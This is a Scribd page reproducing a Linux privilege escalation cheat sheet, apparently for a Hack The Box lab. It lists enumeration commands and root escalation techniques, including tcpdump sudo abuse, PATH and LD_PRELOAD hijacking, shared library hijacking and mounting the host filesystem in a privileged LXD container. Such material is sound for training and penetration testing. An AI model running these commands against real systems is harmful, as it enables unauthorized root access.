Scribd
Upload
70 views

Linux Privilege Escalation Module Cheat Sheet

Linux privilege escalation

Uploaded by

vuduchieu1611
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
70 views

Linux Privilege Escalation Module Cheat Sheet

Linux privilege escalation

Uploaded by

vuduchieu1611
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

LINUX PRIVILEGE ESCALATION

CHEAT SHEET
Command Description

ssh htb-student@<target IP> SSH to lab target

ps aux | grep root See processes running as


root

ps au See logged in users

ls /home View user home directories

ls -l ~/.ssh Check for SSH keys for


current user

history Check the current user's Bash


history

sudo -l Can the user run anything as


another user?

ls -la /etc/cron.daily Check for daily Cron jobs

lsblk Check for unmounted file


systems/drives

find / -path /proc -prune -o -type d -perm -o+w Find world-writeable


2>/dev/null directories

find / -path /proc -prune -o -type f -perm -o+w Find world-writeable files
2>/dev/null

uname -a Check the Kernel versiion


Command Description

cat /etc/lsb-release Check the OS version

gcc kernel_expoit.c -o kernel_expoit Compile an exploit written in


C

screen -v Check the installed version of


Screen

./pspy64 -pf -i 1000 View running processes with


pspy

find / -user root -perm -4000 -exec ls -ldb {} Find binaries with the SUID
\; 2>/dev/null bit set

find / -user root -perm -6000 -exec ls -ldb {} Find binaries with the
\; 2>/dev/null SETGID bit set

sudo /usr/sbin/tcpdump -ln -i ens192 -w Priv esc with tcpdump


/dev/null -W 1 -G 1 -z /tmp/.test -Z root

echo $PATH Check the current user's


PATH variable contents

PATH=.:${PATH} Add a . to the beginning of


the current user's PATH

find / ! -path "*/proc/*" -iname "*config*" - Search for config files


type f 2>/dev/null

ldd /bin/ls View the shared objects


required by a binary

sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 Escalate privileges using


restart LD_PRELOAD

readelf -d payroll | grep PATH Check the RUNPATH of a


binary

gcc src.c -fPIC -shared -o Compiled a shared libary


/development/libshared.so

lxd init Start the LXD initialization


process
Command Description

lxc image import alpine.tar.gz Import a local image


alpine.tar.gz.root --alias alpine

lxc init alpine r00t -c security.privileged=true Start a privileged LXD


container

lxc config device add r00t mydev disk source=/ Mount the host file system in
path=/mnt/root recursive=true a container

lxc start r00t Start the container

showmount -e 10.129.2.12 Show the NFS export list

sudo mount -t nfs 10.129.2.12:/tmp /mnt Mount an NFS share locally

tmux -S /shareds new -s debugsess Created a shared tmux


session socket

./lynis audit system Perform a system audit with


Lynis

You might also like